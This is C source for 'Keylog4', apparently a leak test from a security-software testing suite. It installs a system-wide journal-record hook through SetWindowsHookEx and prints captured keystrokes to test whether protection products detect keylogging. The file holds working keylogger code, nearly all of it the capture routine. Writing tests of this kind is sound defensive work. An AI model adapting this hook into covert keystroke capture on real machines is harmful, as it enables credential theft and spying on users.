/*

 Security Software Testing Suite - Keylog4 (spying test)
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/


 Credits:

   * This method is used by Anti-Keylogger Tester - JournalRecord Hook test,
     written by Guillaume Kaddouch - http://www.firewallleaktester.com/aklt.htm.

   * This method is also used by Simple Keylogger leaktest v1.0 - Journal record hook method,
     written by System Safety Limited.


 Method description:

   * Use SetWindowsHookEx API to insert a keylogging routine into windows hook chain which records
     input messages posted to the system queue.

   * The routine receives messages that contain the information about the pressed keys.

*/

#include <stdio.h>
#include <windows.h>
#include "include/common.h"
#include "include/common-hook.h"
#include "include/common-spy.h"


COM_SPY_DATA kd;


/*
 The callback function for the hook. Here are the keystrokes intercepted.

 For information about parameters, see description of JournalRecordProc in MSDN.
*/

LRESULT CALLBACK hook_routine(int nCode,WPARAM wParam,LPARAM lParam)
{
  PEVENTMSG event_msg=(PEVENTMSG)lParam;
  if ((nCode==HC_ACTION) && (event_msg->message==WM_KEYDOWN))
  {
    BYTE code=(BYTE)event_msg->paramL;
    UINT chr_val=MapVirtualKey(code,2);

    char chr=LOBYTE(chr_val);
    com_spy_print_and_check_input(chr,&kd);
  }

  return CallNextHookEx(NULL,nCode,wParam,lParam);
}


/*
 A thread routine which installs the journal record hook and then it performs the message loop.

 'arg' A pointer to the spying tests structure.

 If the pattern was found the return value is TRUE, otherwise it is FALSE.
*/

DWORD WINAPI keylogging_routine(PCOM_SPY_DATA kd)
{
  HMODULE module=GetModuleHandle(NULL);
  if (module)
  {
    HHOOK hook=SetWindowsHookEx(WH_JOURNALRECORD,hook_routine,GetModuleHandle(NULL),0);
    if (hook)
    {
      if (com_verbosity_get()) printf("Windows hook set, hook = %p.\n",hook);

      printf("Press any key to exit.\n\nCaptured data:\n");

      int done=FALSE;
      while (!done)
      {
        DWORD wres=WaitForSingleObject(kd->event,10);
        switch (wres)
        {
          case WAIT_TIMEOUT:
          {
            MSG msg;
            if (PeekMessage(&msg,NULL,0,0,PM_REMOVE))
            {
              TranslateMessage(&msg);
              DispatchMessage(&msg);
            }

            break;
          }

          case WAIT_OBJECT_0:
            done=TRUE;
            break;

          default:
            if (wres!=WAIT_FAILED) SetLastError(ERROR_SUCCESS);
            com_err_set(kd->err_inf,"Unknown error occurred, WaitForSingleObject returned %ld.\n",wres);

            done=TRUE;
            break;
        }
      }

      UnhookWindowsHookEx(hook);
    } else com_err_set(kd->err_inf,"Unable to install windows hook.\n");
  } else com_err_set(kd->err_inf,"Unable to get current module handle.\n");

  return kd->res;
}



int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
  COM_CONF conf;
  if (!com_console_init_winmain("Keylog4","keylog4",lpCmdLine,&conf,COM_TEST_TYPE_KEYLOG4)) return 1;

  char *used_dlls[]={"user32.dll"};
  if (!com_hook_load_libraries(used_dlls,1)) return 1;

  int res=FALSE;

  COM_ERROR err_inf;
  err_inf.occurred=FALSE;

  if (com_spy_data_init(&kd,&conf,&err_inf))
  {
    DWORD tid=0;
    HANDLE thread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)keylogging_routine,&kd,0,&tid);
    if (thread)
    {
      if (com_verbosity_get()) printf("Helper thread started.\n");

      if (!SetForegroundWindow(GetDesktopWindow()))
        printf("Unable to set foreground window, please switch to another window manually.\n");
      com_spy_wait(&kd,thread);

      CloseHandle(thread);
    } else com_err_set(&err_inf,"Unable to create thread.\n");

    res=kd.res;
    com_spy_data_finit(&kd);
  }

  return com_end(res,&err_inf,&conf);
}
